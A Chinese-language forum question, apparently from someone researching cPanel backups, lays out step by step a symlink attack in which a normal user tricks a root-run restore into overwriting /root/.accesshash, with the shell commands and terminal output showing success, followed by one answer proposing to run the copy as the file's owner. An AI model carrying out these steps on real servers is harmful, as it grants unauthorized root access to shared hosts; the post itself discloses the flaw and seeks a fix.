我目前正在研究 cPanel 备份解决方案。我们现在已获悉此漏洞。
漏洞:获得服务器的完全 ROOT 访问权限
1.)从普通用户账户创建恶意文件:
mkdir root
echo "hello" > root/.accesshash
2.) 等待备份运行
3.) 用符号链接替换 root:
ln -s /root root
4.) 恢复 root/.accesshash(我以 root 身份运行此命令:“cp -rf /backup/.accesshash /home/username/root/”)
5.) 用户现在拥有 root 访问权限,因为我们覆盖了 /root/.accesshash。攻击者可以通过将访问哈希放入此文件中,以 root 身份登录 WHM。
root@cpanel [/home/master]# cat /root/.accesshash
hello
root@cpanel [/home/master]# ls -l /root/.accesshash
-rw-r--r-- 1 master master 3 Nov 20 21:41 /root/.accesshash
root@cpanel [/home/master]#
有人能建议我解决这个问题吗?提前谢谢。
答案1
我会确保备份文件所属用户可以访问,并以此用户的 UID 启动复制/rsync。这样,cp/rsync 将无法跟踪符号链接并写入/root
。